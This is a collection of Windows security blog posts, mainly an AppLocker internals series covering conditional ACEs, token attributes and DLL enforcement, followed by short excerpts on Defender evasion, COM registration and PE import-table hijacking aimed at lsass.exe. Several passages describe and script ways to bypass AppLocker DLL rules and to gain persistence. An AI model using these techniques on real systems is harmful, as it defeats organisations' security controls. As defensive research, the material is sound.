The code isn't very complex, first it builds a SECURITY_SUBJECT_CONTEXT structure manually from the access token passed in as a handle. It uses a policy pointer passed in to find the security descriptor it wants to use for the check. Finally a call is made to SeSrpAccessCheck requesting file execute access. If the check fails with an access denied error it gets converted to the AL specific policy error, otherwise any other success or failure is returned.

The only thing we don't really know in this process is what the Policy value is and therefore what the security descriptor is. We could trace through the code to find how the Policy value is set, but sometimes it's just easier to breakpoint on the function of interest in a kernel debugger and dump the pointed at memory. Taking the debugging approach shows the following:

WinDBG window showing the hex output of the policy pointer which shows the on-disk policy.

Well, what do we have here? We've seen those first 4 characters before, it's the magic signature of the on-disk policy files from part 1. SeSrpAccessCheck is extracting a value from offset 16, which is used as an offset into the same buffer to get the security descriptor. Maybe the policy files already contain the security descriptor we seek? Writing some quick PowerShell I ran it on the Exe.AppLocker policy file to see the result:

PowerShell console showing the security output by the script from Exe.Applocker policy file.

Success, the security descriptor is already compiled into the policy file! The following script defines two functions, Get-AppLockerSecurityDescriptor and Format-AppLockerSecurityDescriptor. Both take a policy file as input and return either a security descriptor object or a formatted representation:
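A rough sketch of what these functions can look like (using NtObjectManager; the DWORD at offset 16 is the security descriptor offset we just saw in the debugger, and this simplified version dumps the DACL as SDDL rather than pretty-printing each ACE with its condition):

function Get-AppLockerSecurityDescriptor {
    param([Parameter(Mandatory)][string]$Path)
    $bytes = [System.IO.File]::ReadAllBytes($Path)
    # The DWORD at offset 16 is the offset of the self-relative security
    # descriptor inside the policy file (as seen in SrpAccessCheckCommon).
    $ofs = [System.BitConverter]::ToInt32($bytes, 16)
    [NtApiDotNet.SecurityDescriptor]::new([byte[]]$bytes[$ofs..($bytes.Length - 1)])
}

function Format-AppLockerSecurityDescriptor {
    param([Parameter(Mandatory)][string]$Path)
    # Quick and dirty: dump the DACL (conditional ACEs included) as SDDL.
    (Get-AppLockerSecurityDescriptor $Path).ToSddl()
}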

If we run Format-AppLockerSecurityDescriptor on the Exe.Applocker file we get the following output for the DACL (trimmed for brevity):

 - Type  : AllowedCallback
 - Name  : Everyone
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Condition: APPID://PATH Contains "%WINDIR%\*"

 - Type  : AllowedCallback
 - Name  : BUILTIN\Administrators
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Condition: APPID://PATH Contains "*"

 - Type  : AllowedCallback
 - Name  : Everyone
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Condition: APPID://PATH Contains "%PROGRAMFILES%\*"

 - Type  : Allowed
 - Name  : APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES
 - Access: Execute|ReadAttributes|ReadControl|Synchronize

 - Type  : Allowed
 - Name  : APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES
 - Access: Execute|ReadAttributes|ReadControl|Synchronize

We can see we have two ACEs for the Everyone group and one for the Administrators group. This matches up with the default configuration we set up in part 1. The last two entries are just there to ensure this access check works correctly when run from an App Container.

The most interesting part is the Condition field. This is a rarely used (at least on consumer versions of the OS) feature of the kernel's access checking which allows a conditional expression to be evaluated to determine whether an ACE is enabled or not. In this case we're seeing the SDDL format (documentation) but under the hood it's actually a binary structure. If we assume that the '*' acts as a globbing character then again this matches our rules, which, let's remember, are:
  • Allow Everyone group access to run any executable under %WINDIR% and %PROGRAMFILES%.
  • Allow Administrators group to run any executable from anywhere.
This is how AL's rules are enforced. When you configure a rule you specify a group, which is added as the SID in an ACE in the policy file's Security Descriptor. The ACE type is set to either Allow or Deny and then a condition is constructed which enforces the rule, whether it be a path, a file hash or a publisher.
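As an aside, you can experiment with these conditional ACEs directly from PowerShell; for example, a hypothetical path-rule ACE written in SDDL form (purely illustrative, not taken from a real policy) parses back into a security descriptor object with NtObjectManager:

# Hypothetical path-rule ACE, parsed back into an SD object.
$sddl = 'D:(XA;;FX;;;WD;(APPID://PATH Contains "%WINDIR%\*"))'
$sd = New-NtSecurityDescriptor -Sddl $sddl
$sd.Dacl | Format-List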

In fact let's add policy entries for a hash and publisher and see what condition is set for them. Download a new policy file from this link and run the Set-AppLockerPolicy command in an admin PowerShell console. Then re-run Format-ApplockerSecurityDescriptor:
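For example, something along these lines, assuming the downloaded policy XML was saved as policy.xml (the on-disk policy files live in the standard %WINDIR%\System32\AppLocker directory):

Set-AppLockerPolicy -XmlPolicy .\policy.xml
Format-AppLockerSecurityDescriptor "$env:windir\System32\AppLocker\Exe.Applocker"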

 - Type  : AllowedCallback
 - Name  : Everyone
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Condition: (Exists APPID://SHA256HASH) && (APPID://SHA256HASH Any_of {#5bf6ccc91dd715e18d6769af97dd3ad6a15d2b70326e834474d952753118c670})

 - Type  : AllowedCallback
 - Name  : Everyone
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Flags : None
 - Condition: (Exists APPID://FQBN) && (APPID://FQBN >= {"O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\MICROSOFT® WINDOWS® OPERATING SYSTEM\*", 0})

We can now see the two new conditional ACEs, one for a SHA256 hash and one for the publisher subject name. Basically rinse and repeat: as more rules and conditions are added to the policy they'll be added to the security descriptor with the appropriate ACEs. Note that the ordering of the rules is very important; for example, Deny ACEs will always go first. I assume the policy file generation code correctly handles the security descriptor generation, but you can now audit it to make sure.

While we now understand how the rules are enforced, where do the values for the condition, such as APPID://PATH, come from? If you read the (poor) documentation about conditional ACEs you'll find these values are Security Attributes. The attributes can be either globally defined or assigned to an access token. Each attribute has a name, then a list of one or more values which can be strings, integers, binary blobs etc. This is what AL is using to store the data in the access check token.

Let's go back a step and see what's going on with AiSetAttributesExe to see how these security attributes are generated.

Setting Token Attributes

The AiSetAttributesExe function takes 4 parameters:
  • A handle to the executable file.
  • Pointer to the current policy.
  • Handle to the primary token of the new process.
  • Handle to the token used for the access check.
The code doesn't look very complex, initially:

NTSTATUS AiSetAttributesExe(
            PVOID Policy, 
            HANDLE FileHandle, 
            HANDLE ProcessToken, 
            HANDLE AccessCheckToken) {
  
    PSECURITY_ATTRIBUTES SecAttr;
    AiGetFileAttributes(Policy, FileHandle, &SecAttr);
    NTSTATUS status = AiSetTokenAttributes(ProcessToken, SecAttr);
    if (NT_SUCCESS(status) && ProcessToken != AccessCheckToken)
        status = AiSetTokenAttributes(AccessCheckToken, SecAttr);
    return status;
}

All the code does is call AiGetFileAttributes, which fills in a SECURITY_ATTRIBUTES structure, and then call AiSetTokenAttributes to set them on the ProcessToken and the AccessCheckToken (if different). AiSetTokenAttributes is pretty much a simple wrapper around the exported (and undocumented) kernel API SeSetSecurityAttributesToken which takes the generated list of security attributes and adds them to the access token for later use in the access check.

The first thing AiGetFileAttributes does is query the file handle for its full path, however this is the native path and takes the form \Device\Volume\Path\To\File. A path of this form is pretty much useless if you wanted to generate a single policy to deploy across an enterprise, such as through Group Policy. Therefore the code converts it back to a Win32 style path such as c:\Path\To\File. Even then there's no guarantee that the OS drive is C:, and what about wanting to have executables on USB keys or other removable drives where the letter could change?

To give the widest coverage the driver also maintains a fixed list of "Macros" which look like Environment variable expansions. These are used to replace the OS drive components as well as define placeholders for removable media. We already saw them in use in the dump of the security descriptor with string components like "%WINDIR%". You can find a list of the macros here, but I'll reproduce them below:
  • %WINDIR% - Windows Folder.
  • %SYSTEM32% - Both System32 and SysWOW64 (on x64).
  • %PROGRAMFILES% - Both Program Files and Program Files (x86).
  • %OSDRIVE% - The OS install drive.
  • %REMOVABLE% - Removable drive, such as a CD or DVD.
  • %HOT% - Hot-pluggable devices such as USB keys.
Note that SYSTEM32 and PROGRAMFILES will map to either 32 or 64 bit directories when running on a 64 bit system (and presumably also ARM directories on ARM builds of Windows?). If you want to pick a specific directory you'll have to configure the rules to not use the macros.

To hedge its bets AL puts every possible path configuration, native path, Win32 path and all possible macroed paths as string values in the APPID://PATH security attribute.

AiGetFileAttributes continues, gathering the publisher information for the file. On Windows 10 the signature and certificate checking is done in multiple ways, first checking the kernel Code Integrity module (CI), then doing some internal work and finally falling back to calling over RPC to the running APPIDSVC. The information, along with the version number of the binary is put into the APPID://FQBN attribute, which stands for Fully Qualified Binary Name.

The final step is generating the file hash, which is stored in a binary blob attribute. AL supports three hash algorithms with the following attribute names:
  • APPID://SHA256HASH - Authenticode SHA256.
  • APPID://SHA1HASH - Authenticode SHA1.
  • APPID://SHA256FLATHASH - SHA256 over entire file.
As the attributes are applied to both tokens we should be able to see them on the primary token of a normal user process. By running the following PowerShell command we can see the added security attributes on the current process token.

PS> $(Get-NtToken).SecurityAttributes | ? Name -Match APPID

Name       : APPID://PATH
ValueType  : String
Flags      : NonInheritable, CaseSensitive
Values     : {
   %SYSTEM32%\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE,
   %WINDIR%\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE,  
    ...}

Name       : APPID://SHA256HASH
ValueType  : OctetString
Flags      : NonInheritable
Values     : {133 66 87 106 ... 85 24 67}

Name       : APPID://FQBN
ValueType  : Fqbn
Flags      : NonInheritable, CaseSensitive
Values     : {Version 10.0.18362.1 - O=MICROSOFT CORPORATION, ... }


Note that the APPID://PATH attribute is always added, however APPID://FQBN and APPID://*HASH are only generated and added if there are rules which rely on them.

The Mystery of the Twin Tokens

We've come to the final stage, we now know how the security attributes are generated and applied to the two access tokens. The question now is why are there two tokens, the process token and one just for access checking?

Everything happens inside AiGetTokens, which is shown in a simplified form below:


NTSTATUS AiGetTokens(HANDLE ProcessId,
                     PHANDLE ProcessToken,
                     PHANDLE AccessCheckToken)
{
  HANDLE TokenHandle;
  AiOpenTokenByProcessId(ProcessId, &TokenHandle);

  NTSTATUS status = STATUS_SUCCESS;
  *ProcessToken = TokenHandle;
  if (!AccessCheckToken)
    return STATUS_SUCCESS;

  BOOL IsRestricted;
  status = ZwQueryInformationToken(TokenHandle, TokenIsRestricted, &IsRestricted);
  DWORD ElevationType;
  status = ZwQueryInformationToken(TokenHandle, TokenElevationType, &ElevationType);

  HANDLE NewToken = NULL;
  if (ElevationType != TokenElevationTypeFull)
      status = ZwQueryInformationToken(TokenHandle, TokenLinkedToken, &NewToken);

  if (!IsRestricted
    || NT_SUCCESS(status)
    || (status = SeGetLogonSessionToken(TokenHandle, 0, &NewToken), NT_SUCCESS(status))
    || status == STATUS_NO_TOKEN) {
    if (NewToken)
      *AccessCheckToken = NewToken;
    else
      *AccessCheckToken = TokenHandle;
  }

  return status;
}

Let's summarize what's going on. First, the easy one: the ProcessToken handle is just the process token opened from the process, based on its PID. If the AccessCheckToken is not specified then the function ends here. Otherwise the AccessCheckToken is set to one of three values:
  1. If the token is a non-elevated (UAC) token then use the full elevated token.
  2. If the token is 'restricted' and not a UAC token then use the logon session token.
  3. Otherwise use the primary token of the new process.
We can now understand why a non-elevated UAC admin has Administrator rules applied to them. If you're running as the non-elevated user token then case 1 kicks in and sets the AccessCheckToken to the full administrator token. Now any rule checks which specify the Administrators group will pass.

Case 2 is also interesting, a "restricted" token in this case is one which has been passed through the CreateRestrictedToken API and has restricted SIDs attached. This is used by various sandboxes especially Chromium's (and by extension anyone who uses it such as Firefox). Case 2 ensures that if the process token is restricted and therefore might not pass the access check, say the Everyone group is disabled, then the access check is done instead against the logon session's token, which is the master token from which all others are derived in a logon session.

If nothing else matches then case 3 kicks in and just assigns the primary token to the AccessCheckToken. There are edge cases in these rules. For example you can use CreateRestrictedToken to create a new access token with disabled groups, but which doesn't have restricted SIDs. This results in case 2 not being applied and so the access check is done against the limited token, which could very easily fail to validate, causing the process to be terminated.

There's also a more subtle edge case here if you look back at the code. If you create a restricted token of a UAC admin token then process creation typically fails during the policy check. When the UAC token is a full admin token the second call to ZwQueryInformationToken will not be made, which results in NewToken being NULL. However, in the final check IsRestricted is TRUE, so the second condition is checked; as status is STATUS_SUCCESS (from the first call to ZwQueryInformationToken) this passes and we enter the if block without ever calling SeGetLogonSessionToken. As NewToken is still NULL, AccessCheckToken is set to the primary process token, which is the restricted token, and the subsequent access check will fail. This is actually a long-standing bug in Chromium: it can't be run as a UAC admin if AppLocker is enforced.

That's the end of how AL does process enforcement. Hopefully it's been helpful. Next time I'll dig into how DLL enforcement works.

Locking Resources to Specific Processes

Before we go, here's a silly trick which might now be obvious. Ever wanted to restrict access to resources, such as files, to specific processes? With the AL-applied security attributes, now you can. All you need to do is apply the same conditional ACE syntax to your file and the kernel will do the enforcement for you. For example create the text file C:\TEMP\ABC.TXT; now, to only allow notepad to open it, do the following in PowerShell:

Set-NtSecurityDescriptor \??\C:\TEMP\ABC.TXT `
     -SecurityDescriptor 'D:(XA;;GA;;;WD;(APPID://PATH Contains "%SYSTEM32%\NOTEPAD.EXE"))' `
     -SecurityInformation Dacl

Make sure that the path is in all upper case. You should now find that while PowerShell (or any other application) can't open the text file, you can open and modify it just fine in notepad. Of course this won't work across network boundaries and is pretty easy to get around, but that's not my problem ;-)



The Internals of AppLocker - Part 4 - Blocking DLL Loading

By: tiraniddo
21 November 2019 at 06:42
This is part 4 in a short series on the internals of AppLocker (AL). Part 1 is here, part 2 here and part 3 here. As I've mentioned before this is how AL works on Windows 10 1909, it might differ on other versions of Windows.

In the first three parts of this series I covered the basics of how AL blocked process creation. We can now tackle another, optional component, blocking DLL loading. If you dig into the Group Policy Editor for Windows you will find a fairly strong warning about enabling DLL rules for AL:

Warning text on DLL rules stating that enabling them could affect system performance.

It seems MS doesn't necessarily recommend enabling DLL blocking rules, but we'll dig in anyway as I can't find any official documentation on how it works and it's always interesting to better understand how something works before relying on it.

We know from the part 1 that there's a policy for DLLs in the DLL.Applocker file. We might as well start with dumping the Security Descriptor from the file using the Format-AppLockerSecurityDescriptor function from part 3, to check it matches our expectations. The DACL is as follows:

 - Type  : AllowedCallback
 - Name  : Everyone
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Condition: APPID://PATH Contains "%WINDIR%\*"

 - Type  : AllowedCallback
 - Name  : Everyone
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Condition: APPID://PATH Contains "%PROGRAMFILES%\*"

 - Type  : AllowedCallback
 - Name  : BUILTIN\Administrators
 - Access: Execute|ReadAttributes|ReadControl|Synchronize
 - Condition: APPID://PATH Contains "*"

 - Type  : Allowed
 - Name  : APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES
 - Access: Execute|ReadAttributes|ReadControl|Synchronize

 - Type  : Allowed
 - Name  : APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES
 - Access: Execute|ReadAttributes|ReadControl|Synchronize

Nothing shocking here, just our rules written out in a security descriptor. However it gives us a hint that perhaps some of the enforcement is being done inside the kernel driver. Unsurprisingly, if you look at the names in the APPID driver you'll find a function called SrpVerifyDll. There's a good chance that's our target to investigate.

By chasing references you'll find the SrpVerifyDll function being called via a Device IO control code sent to a device object exposed by the APPID driver (\Device\SrpDevice). I'll save you the effort of reverse engineering, as it's pretty routine. The control code and input/output structures are as follows:

// 0x225804
#define IOCTL_SRP_VERIFY_DLL CTL_CODE(FILE_DEVICE_UNKNOWN, 1537, \
            METHOD_BUFFERED, FILE_READ_DATA)

struct SRP_VERIFY_DLL_INPUT {
    ULONGLONG FileHandle;
    USHORT FileNameLength;
    WCHAR FileName[ANYSIZE_ARRAY];
};

struct SRP_VERIFY_DLL_OUTPUT {
    NTSTATUS VerifyStatus;
};

Looking at SrpVerifyDll itself there's not much to really note. It's basically very similar to the verification done for process creation, which I described in detail in parts 2 and 3:
  1. An access check token is captured and duplicated. If the token is restricted query for the logon session token instead.
  2. The token is checked whether it can bypass policy by being SANDBOX_INERT or a service.
  3. Security attributes are gathered using AiGetFileAttributes on the passed in file handle.
  4. Security attributes set on token using AiSetTokenAttributes.
  5. Access check performed using policy security descriptor and status result written back to the Device IO Control output.
It makes sense that the security attributes have to be recreated, as the access check needs to know the information about the DLL being loaded, not the original executable. Even though a file name is passed in the input structure, as far as I can tell it's only used for logging purposes.

There is one big difference in step 1, where the token is captured, compared to the process I documented in part 3. In process blocking, if the current token was a non-elevated UAC token then the code would query for the full elevated token and use that to do the access check. This means that even if you were creating a process as the non-elevated user the access check was still performed as if you were an administrator. In DLL blocking this step does not take place, which can lead to a weird case of being able to create a process in any location, but not being able to load any DLLs in the same directory with the default policy. I don't know if this is intentional or if Microsoft just doesn't care?

Who calls the Device IO Control to verify the DLL? To save me some effort I just set a breakpoint on SrpVerifyDll in the kernel debugger and then dumped the stack to find out the caller:

Breakpoint 1 hit
appid!SrpVerifyDll:
fffff803`38cff100 48895c2410      mov qword ptr [rsp+10h],rbx
0: kd> kc
 # Call Site
00 appid!SrpVerifyDll
01 appid!AipDeviceIoControlDispatch
02 nt!IofCallDriver
03 nt!IopSynchronousServiceTail
04 nt!IopXxxControlFile
05 nt!NtDeviceIoControlFile
06 nt!KiSystemServiceCopyEnd
07 ntdll!NtDeviceIoControlFile
08 ADVAPI32!SaferpIsDllAllowed
09 ADVAPI32!SaferiIsDllAllowed
0a ntdll!LdrpMapDllNtFileName
0b ntdll!LdrpMapDllFullPath
0c ntdll!LdrpProcessWork
0d ntdll!LdrpLoadDllInternal
0e ntdll!LdrpLoadDll

Easy, it's being called from the function SaferiIsDllAllowed which is being invoked from LdrLoadDll. This of course makes perfect sense, however it's interesting that NTDLL is calling a function in ADVAPI32, has MS never heard of layering violations? Let's look into LdrpMapDllNtFileName which is the last function in NTDLL before the transition to ADVAPI32. The code which calls SaferiIsDllAllowed looks like the following:

NTSTATUS status;

if ((LoadInfo->LoadFlags & 0x100) == 0 
        && LdrpAdvapi32DllHandle) {
  status = LdrpSaferIsDllAllowedRoutine(
        LoadInfo->FileHandle, LoadInfo->FileName);
}

The call to SaferiIsDllAllowed  is actually made from a global function pointer. This makes sense as NTDLL can't realistically link directly to ADVAPI32. Something must be initializing these values, and that something is LdrpCodeAuthzInitialize. This initialization function is called during the loader initialization process before any non-system code runs in the new process. It first checks some registry keys, mostly importantly whether "\Registry\Machine\System\CurrentControlSet\Control\Srp\GP\DLL" has any sub-keys, and if so it proceeds to load the ADVAPI32 library using LdrLoadDll and query for the exported SaferiIsDllAllowed function. It stores the DLL handle in LdrpAdvapi32DllHandle and the function pointer 'XOR' encrypted in LdrpSaferIsDllAllowedRoutine.
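You can check the triggering condition yourself; if the following key has any sub-keys then NTDLL will wire up the verification callback at process start:

Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Control\Srp\GP\DLL'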

Once SaferiIsDllAllowed is called the status is checked. If it's not STATUS_SUCCESS then the loader backs out and refuses to continue loading the DLL. It's worth reiterating how different this is from WDAC, where the security checks are done inside the kernel image mapping process. You shouldn't be able to even create a mapped image section which isn't allowed by policy when WDAC is enforced. However with AL loading a DLL is just a case of bypassing the check inside a user mode component.

If we look back at the calling code in LdrpMapDllNtFileName we notice there are two conditions which must be met before the check is made, the LoadFlags must not have the flag 0x100 set and LdrpAdvapi32DllHandle must be non-zero.

The most obvious condition to modify is LdrpAdvapi32DllHandle. If you already have code running (say VBA) you could use WriteProcessMemory to modify the memory location of LdrpAdvapi32DllHandle to be 0. Now any calls to LoadLibrary will not get verified and you can load any DLL you like outside of policy. In theory you might also be able to get the load of ADVAPI32 to fail. However unless LdrLoadDll returns STATUS_NOT_FOUND for the DLL load then the error causes the process to fail during initialization. As ADVAPI32 is in the known DLLs I can't see an easy way around this (I tried by renaming the main executable trick from the AMSI bypass).

The other condition, the LoadFlags, is more interesting. There still exists a documented LOAD_IGNORE_CODE_AUTHZ_LEVEL flag you can pass to LoadLibraryEx which used to be able to bypass AppLocker DLL verification. However, as with SANDBOX_INERT this in theory was limited to only System and TrustedInstaller with KB2532445, although according to Stefan Kanthak it might not be blocked. That said I can't get this flag to do anything on Windows 10 1909 and tracing through LdrLoadDll it doesn't look like it's ever used. Where does this 0x100 flag come from then? Seems it's set by the LdrpDllCharacteristicsToLoadFlags function at the start of LdrLoadDll. Which looks like the following:

int LdrpDllCharacteristicsToLoadFlags(int DllCharacteristics) {
  int load_flags = 0;
  // ...
  if (DllCharacteristics & 0x1000)
    load_flags |= 0x100;
   
  return load_flags;
}

If we pass in 0x1000 as a DllCharacteristics flag (this doesn't seem to work by putting it in the DLL PE headers as far as I can tell) which is the second parameter to LdrLoadDll then the DLL will not be verified against the DLL policy. The DLL Characteristic flag 0x1000 is documented as IMAGE_DLLCHARACTERISTICS_APPCONTAINER but I don't know what API sets this flag in the call to LdrLoadDll. My original guess was LoadPackagedLibrary but that doesn't seem to be the case.

A simple PowerShell script to test this flag is below:
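Here's a rough sketch of what such a Start-Dll function can look like (a reconstruction, not necessarily the original script; it P/Invokes LdrLoadDll directly so the DllCharacteristics parameter can be supplied as the second argument):

Add-Type -TypeDefinition @'
using System;
using System.Runtime.InteropServices;

public static class Loader
{
    [StructLayout(LayoutKind.Sequential)]
    public struct UNICODE_STRING
    {
        public ushort Length;
        public ushort MaximumLength;
        public IntPtr Buffer;
    }

    [DllImport("ntdll.dll")]
    public static extern int LdrLoadDll(IntPtr SearchPath,
        ref int DllCharacteristics, ref UNICODE_STRING DllName,
        out IntPtr BaseAddress);
}
'@

function Start-Dll {
    param(
        [Parameter(Mandatory)][string]$Path,
        [int]$DllCharacteristics = 0
    )
    # Build the UNICODE_STRING by hand so the buffer stays valid for the call.
    $buffer = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($Path)
    try {
        $name = New-Object 'Loader+UNICODE_STRING'
        $name.Length = [uint16]($Path.Length * 2)
        $name.MaximumLength = [uint16](($Path.Length + 1) * 2)
        $name.Buffer = $buffer
        $handle = [IntPtr]::Zero
        $status = [Loader]::LdrLoadDll([IntPtr]::Zero, [ref]$DllCharacteristics,
            [ref]$name, [ref]$handle)
        if ($status -ne 0) {
            throw ("LdrLoadDll failed with status 0x{0:X8}" -f $status)
        }
        $handle
    }
    finally {
        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($buffer)
    }
}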
If you run Start-Dll "Path\To\Any.DLL" where the DLL is not in an allowed location you should find it fails. However if you run Start-Dll "Path\To\Any.DLL" 0x1000 you'll find the DLL now loads.

Of course realistically the DLL blocking is really more about bypassing the process blocking by using the DLL loader instead. Without being able to call LdrLoadDll or write to process memory it won't be easy to bypass the DLL verification (but of course it's not impossible).

This is the last part on AL for a while, I've got to do other things. I might revisit this topic later to discuss AppX support, SmartLocker and some other fun tricks.

Evading WinDefender ATP credential-theft: a hit after a hit-and-miss start

2 December 2019 at 00:00
Intro Recently, I became rather intrigued after reading this article from MSTIC about how Windows Defender Advanced Threat Protection (WDATP) is supposed to detect credential dumping by statistically probing the amount of data read from the LSASS process. A little background is first necessary, though: on a host guarded by WDATP, when a standard credential-dumper such as mimikatz is executed, it should trigger an alert like the following one. This alert is, in all likelihood, triggered as a result of mimikatz employing MiniDumpWriteDump when trying to access the LSASS process, which in turn uses ReadProcessMemory as a means of copying data from one process address space to another one.

The Mysterious Case of a Broken Virus Scanner

By: tiraniddo
6 December 2019 at 03:08
On the VM (a default Windows 10 1909 install) I used for my AppLocker series I wanted to test out the new Edge. I opened the old Edge and tried to download the canary installer, however the download failed; Edge said the installer had a virus and it'd been deleted. How rude! I also tried the download in Chrome on the same machine with the same result, even ruder!

Downloading Edge Canary in Edge with AppLocker. Shows a bar that the download has been deleted because it's a virus.

Oddly it worked if I turned off DLL Rule Enforcement, but not when I enabled it again. My immediate thought was that the virus checking was trying to map the executable and somehow hitting the DLL verification callback, failing because the file was in my Downloads folder which is not in the default rule set. That seemed pretty unlikely, however clearly something was being blocked from running. Fortunately AppLocker maintains an Audit Log under "Applications and Services Logs -> Microsoft -> Windows -> AppLocker -> EXE and DLL" so we can quickly diagnose the failure.

Failing DLL load in audit log showing it tried to load %OSDRIVE%\PROGRAMDATA\MICROSOFT\WINDOWS DEFENDER\PLATFORM\4.18.1910.4-0\MPOAV.DLL

The failing DLL load was for "%OSDRIVE%\PROGRAMDATA\MICROSOFT\WINDOWS DEFENDER\PLATFORM\4.18.1910.4-0\MPOAV.DLL". This makes sense, the default rules only permit %WINDIR% and %PROGRAMFILES% for normal users, however %OSDRIVE%\ProgramData is not allowed. This is intentional as you don't want to grant access to locations a normal user could write to, so generally allowing all of %ProgramData% would be asking for trouble. [update:20191206] of course this is known about (I'm not suggesting otherwise), AaronLocker should allow this DLL by default.

I thought it'd at least be interesting to see why it fails and what MPOAV is doing. As the same failure occurred in both Edge (I didn't test IE) and Chrome it was clearly some common API they were calling. As Chrome is open source it made more sense to look there. Tracking down the resource string for the error led me to this code, which was using the Attachment Services API: a common interface to verify downloaded files and attachments, apply MOTW and check for viruses.

When the IAttachmentExecute::Save method is called the file is checked for viruses using the currently registered anti-virus COM object which implements the IOfficeAntiVirus interface. The implementation for that COM class is in MPOAV.DLL, which as we saw is blocked so the COM object creation fails. And a failure to create the object causes the Save method to fail and the Attachment Services code to automatically delete the file so the browser can't even do anything about it such as ask the user. Ultra rude!

You might wonder how this COM class is registered. An implementor needs to register their COM object with a Category ID of "{56FFCC30-D398-11d0-B2AE-00A0C908FA49}". If you have OleViewDotNet setup (note there are other tools) you can dump all registered classes using the following PowerShell command:

Get-ComCategory -CatId '56FFCC30-D398-11d0-B2AE-00A0C908FA49' | Select -ExpandProperty ClassEntries

On a default installation of Windows 10 you should find a single class, "Windows Defender IOfficeAntiVirus implementation" registered which is implemented in the MPOAV DLL. We can try and create the class with DLL enforcement to convince ourselves that's the problem:
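If you want to reproduce the check from the screenshot below, something like the following should do it (a sketch; it assumes the class entries returned by Get-ComCategory expose the CLSID via a Clsid property, as OleViewDotNet's entries do):

$cls = Get-ComCategory -CatId '56FFCC30-D398-11d0-B2AE-00A0C908FA49' |
    Select-Object -ExpandProperty ClassEntries | Select-Object -First 1
# With DLL rules enforced this throws, as COM can't load MPOAV.DLL.
[Activator]::CreateInstance([Type]::GetTypeFromCLSID($cls.Clsid))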

PowerShell error when creating MSOAV COM object. Fails with AppLocker policy block error.

No doubt this has been documented before (and I've not looked [update:20191206] of course Hexacorn blogged about it) but you could probably COM hijack this class (or register your own) and get notified of every executable downloaded by the user's web browser. Perhaps even backdoor everything. I've not tested that however ;-)

This issue does demonstrate a common weakness with any application allow-listing solution. You've got to add a rule to allow this (probably undocumented) folder in your DLL rules. Or you could allow-list all Microsoft Defender certificates I suppose. Potentially both of these criteria could change and you end up having to fix random breakage which wouldn't be fun across a large fleet of machines. It also demonstrates a weird issue with attachment scanning, if your AV is somehow misconfigured things will break and there's no obvious reason why. Perhaps we need to move on from using outdated APIs to do this process or at least handle failure better.

Windows Library Code

9 December 2019 at 12:00
Intro I thought I would make a guide about Windows library code. The target audience is beginners who want to understand more about Windows reverse engineering, development and compilation. I tried to make this guide as simple as possible. A “Library” is a term used in computer science for a collection of pre-written code / variables. Libraries are pretty useful for developers because they save development time. There are 2 types of libraries:

PE Import Table hijacking as a way of achieving persistence - or exploiting DLL side loading

27 December 2019 at 03:56

Preface

In this post I describe a simple trick I came up with recently - something which is definitely nothing new, but as I found it useful and haven't seen it elsewhere, I decided to write it up.

What we want to achieve

So - let's consider backdooring a Windows executable with our own code by modifying its binary file OR one of its dependencies (so we are not talking about runtime code injection techniques or hooking, nor about abusing known persistence features like AppInit DLLs and the like).

Most of us are familiar with execution flow hijacking combined with:

We've probably heard of IAT hooking (in-memory), but how about on-disk?

Import Table and DLL loading

Both EXE and DLL files make use of a PE structure called Import Table, which is basically a list of external functions (usually just WinAPI) the program is using, along with the names of the DLL files they are located in. This list can be easily reviewed with any PE analysis/editing tool like LordPE, PEView, PEStudio, PEBear and so on:

An excerpt of the calc.exe Import table displayed in PEView

These are the runtime dependencies resolved by the Windows PE loader upon image execution, making the new process call LoadLibrary() on each of those DLL files. Then the relevant entries for each individual function are replaced with its current address within the just-loaded library (the GetProcAddress() lookup) - this is the normal and usual way of having this done, taken care of by the linker during build and then by the Windows loader using the Import Table.

I need to mention that the process can also be performed directly by the program (instead of using the Import Table), by calling both LoadLibrary() and then GetProcAddress(), respectively, from its own code at some point (everyone who has written Windows shellcode knows this :D). This second way of loading DLLs and calling functions from them is sometimes referred to as dynamic linking (e.g. required for calling native APIs) and in many cases is a suspicious indicator (often seen in malicious software).
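To make the distinction concrete, here is a minimal, generic dynamic-linking snippet using that LoadLibrary()/GetProcAddress() pair (purely illustrative, not specific to the technique described below):

#include <windows.h>

typedef int (WINAPI *MessageBoxA_t)(HWND, LPCSTR, LPCSTR, UINT);

int main(void)
{
    /* Resolve the DLL and the function at runtime instead of via the Import Table. */
    HMODULE mod = LoadLibraryA("user32.dll");
    if (mod == NULL) return 1;
    MessageBoxA_t pMessageBoxA = (MessageBoxA_t)GetProcAddress(mod, "MessageBoxA");
    if (pMessageBoxA != NULL)
        pMessageBoxA(NULL, "Resolved at runtime", "Dynamic linking", MB_OK);
    FreeLibrary(mod);
    return 0;
}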

Anyway, let's focus on the Import Table and how we can abuse it.

Getting right to it - hijacking the Import Table and creating the malicious PoC DLL

WARNING: Please avoid experimenting with this on a production system before you develop and test a working PoC, especially when dealing with native Windows DLLs (you could break your system, you've been warned). Do it on a VM after making a backup snapshot first.

So, without any further ado, let's say that for some reason (🤭) we would like to inject our code into lsass.exe.

Let's start with having a procmon look to see what DLLs does lsass.exe load:

A procmon filter for DLL loads performed by lsass.exe
The results once the filter is applied

Now, we are going to slightly modify one of these DLLs.

When choosing, preferably we should go after one that is not signed (as we want to choose one with high chances of being loaded after our modification).

But in this case, to my knowledge, they are all signed (some with embedded signatures - with the Digital Signatures tab visible in the explorer properties of the file, others signed in the C:\Windows\System32\catroot\).

The execution policy on this system, however, is unrestricted... oh wait, that's what I thought up until finishing this write-up, but then, for diligence, I decided to actually take a screenshot (after seeing it I was surprised it worked, please feel free to try this at home):

